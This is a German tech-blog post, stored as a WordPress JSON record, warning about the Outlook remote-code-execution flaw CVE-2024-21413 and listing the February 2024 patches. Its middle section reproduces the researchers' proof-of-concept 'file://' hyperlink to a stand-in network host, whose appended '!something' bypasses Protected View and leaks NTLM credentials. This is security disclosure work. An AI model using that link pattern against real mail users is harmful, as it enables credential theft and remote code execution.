{"id":292255,"date":"2024-02-15T08:41:17","date_gmt":"2024-02-15T07:41:17","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=292255"},"modified":"2024-02-15T14:55:39","modified_gmt":"2024-02-15T13:55:39","slug":"warnung-vor-kritischer-outlook-rce-schwachstelle-cve-2024-21413","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2024\/02\/15\/warnung-vor-kritischer-outlook-rce-schwachstelle-cve-2024-21413\/","title":{"rendered":"Warnung vor kritischer Outlook RCE-Schwachstelle CVE-2024-21413"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2012\/07\/Office1.jpg\" width=\"55\" height=\"60\" align=\"left\" \/>[<a href=\"https:\/\/borncity.com\/win\/2024\/02\/15\/warning-about-critical-outlook-rce-vulnerability-cve-2024-21413\/\" target=\"_blank\" rel=\"noopener\">English<\/a>]Ich ziehe es nochmals separat heraus: In Microsoft Outlook wurde eine als kritisch eingestufte CVE-2024-21413 bekannt, die mit den Februar 2024 Sicherheitsupdates geschlossen wird. Die Remote Code Execution-Schwachstelle l\u00e4sst sich geradezu trivial ausnutzen. Hier nochmals einige Informationen dazu.<\/p>\n<p><!--more--><\/p>\n<h2>Outlook RCE-Schwachstelle CVE-2024-21413<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg07.met.vgwort.de\/na\/2942aabf55894e71a9156a713725c745\" alt=\"\" width=\"1\" height=\"1\" \/>Ich habe die Schwachstelle <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\">CVE-2024-21413<\/a> bisher noch nicht im Blog thematisiert. Es handelt sich um eine Remote Code Execution (RCE) Schwachstelle in Microsoft Outlook, die in Outlook 2016 bis 2021 auftreten soll (siehe <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2024-21413\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cve.org\/CVERecord?id=CVE-2024-21413<\/a>). Von Microsoft gibt es diesen <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\">CVE-2024-21413<\/a>-Supportbeitrag vom 13. Februar 2024, der am 14. Februar nochmals aktualisiert wurde.<\/p>\n<p>Die von Checkpoint Security aufgedeckte Schwachstelle erm\u00f6glicht einem Angreifer die gesch\u00fctzte Office-Ansicht zu umgehen und das Dokument im Bearbeitungsmodus statt im gesch\u00fctzten Modus zu \u00f6ffnen. Sogar das Vorschaufenster f\u00fcr Mails in Microsoft Outlook reicht als Angriffsvektor. Ein Angreifer, der diese Sicherheitsl\u00fccke erfolgreich ausnutzt, k\u00f6nnte hohe so Privilegien erlangen, die Lese-, Schreib- und L\u00f6schfunktionen umfassen.<\/p>\n<p>Dazu muss der Angreifer einen b\u00f6sartigen Link erstellen, der das Protected View-Protokoll umgeht. Das f\u00fchrt dann zum Abfluss lokaler NTLM-Anmeldeinformationen und zur Remotecodeausf\u00fchrung (RCE). Microsoft stuft das Ganze als kritisch ein.<\/p>\n<h2>Triviale Ausnutzbarkeit von CVE-2024-21413<\/h2>\n<p>Die Entdecker von Checkpoint Security haben zum 14. Februar 2024 die als MonikerLink bezeichnete Schwachstelle CVE-2024-21413 im Beitrag <a href=\"https:\/\/research.checkpoint.com\/2024\/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture\/\" target=\"_blank\" rel=\"noopener\">THE RISKS OF THE #MONIKERLINK BUG IN MICROSOFT OUTLOOK AND THE BIG PICTURE<\/a> dokumentiert und weisen in nachfolgendem <a href=\"https:\/\/twitter.com\/_CPResearch_\/status\/1757821672487293309\" target=\"_blank\" rel=\"noopener\">Tweet<\/a> darauf hin.<\/p>\n<p><a href=\"https:\/\/twitter.com\/_CPResearch_\/status\/1757821672487293309\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Outlook RCE vulnerability CVE-2024-21413\" src=\"https:\/\/i.postimg.cc\/Nfk4Pbyn\/image.png\" alt=\"Outlook RCE vulnerability CVE-2024-21413\" \/><\/a><\/p>\n<p>Bei der Analyse von Angriffsvektoren \u00fcber Hyperlinks in Outlook ist den Sicherheitsforschern eine besondere Konstruktion aufgefallen, mit der sich die Schutzmechanismen von Outlook umgehen lassen. Wird in einem Dokument ein Hyperlink mit http oder https eingebettet, startet Outlook den Standard-Browser, um diesen anzuzeigen. Verweist der URL-Link auf ein Anwendungs-URL-Protokoll, wie zum Beispiel:<\/p>\n<p><em>&lt;a href=\"skype:SkypeName?call\"&gt;Call me on Skype&lt;\/a&gt;<\/em><\/p>\n<p>erscheint eine Warnung. Outlook meldet, dass man ein potentielles Sicherheitsrisiko entdeckt hat. So weit so gut, aber was ist, wenn diese URL etwas abgewandelt wird &#8211; zum Beispiel <em>file <\/em>statt skype?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i.postimg.cc\/JhMS2K5Y\/image.png\" \/><\/p>\n<p>Nach einigen Experimenten haben die Sicherheitsforscher festgestellt, dass ein Ausrufezeichen ausreicht, um die Schutzmechanismen zu umgehen. Nachfolgender Link demonstriert dies:<\/p>\n<p>&lt;a href=\"file:\/\/\/\\\\10.10.111.111\\test\\test.rtf!something\"&gt;CLICK ME&lt;\/a&gt;<\/p>\n<p>Das angeh\u00e4ngte !something verwirrt den Parser f\u00fcr die URL, so dass dieser den Link freigibt. Der Check Point Research-Beitrag l\u00f6st die Details auf (die Kollegen von Bleeping Computer gehen <a href=\"https:\/\/research.checkpoint.com\/2024\/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture\/\" target=\"_blank\" rel=\"noopener\">hier<\/a> auch auf das Thema ein) und zeigt, wie trivial das Ganze ausgenutzt werden kann. In <a href=\"https:\/\/borncity.com\/blog\/2024\/02\/13\/microsoft-security-update-summary-13-februar-2024\/#comment-173091\" target=\"_blank\" rel=\"noopener\">diesem Kommentar<\/a> weist ein Leser hin, das Microsoft seine eigene Einstufung in Bezug auf eine Ausnutzung ge\u00e4ndert und zur\u00fcckgenommen hat.<\/p>\n<h2>Outlook updaten, um gesch\u00fctzt zu sein<\/h2>\n<p>Um gesch\u00fctzt zu sein, m\u00fcssen Kunden mit Office 2016 alle Updates f\u00fcr diese Office-Version von Februar 2024 installieren, die Microsoft in seinem <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\">CVE-2024-21413<\/a>-Supportbeitrag aufgelistet hat.<\/p>\n<ul>\n<li>Microsoft Office 2016 <a href=\"https:\/\/support.microsoft.com\/help\/5002537\" target=\"_blank\" rel=\"noopener\">KB5002537<\/a><\/li>\n<li>Microsoft Office 2016 <a href=\"https:\/\/support.microsoft.com\/help\/5002467\" target=\"_blank\" rel=\"noopener\">KB5002467<\/a><\/li>\n<li>Microsoft Office 2016 <a href=\"https:\/\/support.microsoft.com\/help\/5002522\" target=\"_blank\" rel=\"noopener\">KB5002522<\/a><\/li>\n<li>Microsoft Office 2016 <a href=\"https:\/\/support.microsoft.com\/help\/5002469\" target=\"_blank\" rel=\"noopener\">KB5002469<\/a><\/li>\n<li>Microsoft Office 2016 <a href=\"https:\/\/support.microsoft.com\/help\/5002519\" target=\"_blank\" rel=\"noopener\">KB5002519<\/a><\/li>\n<\/ul>\n<p>F\u00fcr Microsoft Office 2019 und 2021 (Click-to-Run-Versionen) und Microsoft Office 365 wurden die Pakete ebenfalls aktualisiert, so dass die Schwachstelle geschlossen ist. Die Updates sind im Microsoft <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\">CVE-2024-21413<\/a>-Supportbeitrag aufgelistet.<\/p>\n<p><strong>\u00c4hnliche Artikel:<br \/>\n<\/strong><a href=\"https:\/\/borncity.com\/blog\/2024\/02\/07\/office-projekt-update-kb5002530-vom-6-februar-2024\/\">Office: Projekt Update KB5002530 vom 6. Februar 2024<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/13\/microsoft-security-update-summary-13-februar-2024\/\">Microsoft Security Update Summary (13. Februar 2024)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/14\/patchday-windows-10-updates-13-februar-2024\/\">Patchday: Windows 10-Updates (13. Februar 2024)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/14\/patchday-windows-11-server-2022-updates-13-februar-2024\/\">Patchday: Windows 11\/Server 2022-Updates (13. Februar 2024)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/14\/windows-server-2012-r2-und-windows-7-server-2008-r2-13-februar-2024\/\">Windows Server 2012 \/ R2 und Windows 7\/Server 2008 R2 (13. Februar 2024)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/15\/microsoft-office-updates-13-februar-2024\/\">Microsoft Office Updates (13. Februar 2024)<\/a><\/p>\n<p><a href=\"https:\/\/borncity.com\/blog\/2024\/02\/13\/exchange-server-sicherheitsupdate-cu-14-13-februar-2024\/\">Exchange Server Updates (13. Februar 2024)<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[English]Ich ziehe es nochmals separat heraus: In Microsoft Outlook wurde eine als kritisch eingestufte CVE-2024-21413 bekannt, die mit den Februar 2024 Sicherheitsupdates geschlossen wird. Die Remote Code Execution-Schwachstelle l\u00e4sst sich geradezu trivial ausnutzen. Hier nochmals einige Informationen dazu.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[270,426,185],"tags":[215,4328,4315],"class_list":["post-292255","post","type-post","status-publish","format-standard","hentry","category-office","category-sicherheit","category-update","tag-outlook","tag-sicherheit","tag-update"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/292255","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=292255"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/292255\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=292255"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=292255"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=292255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}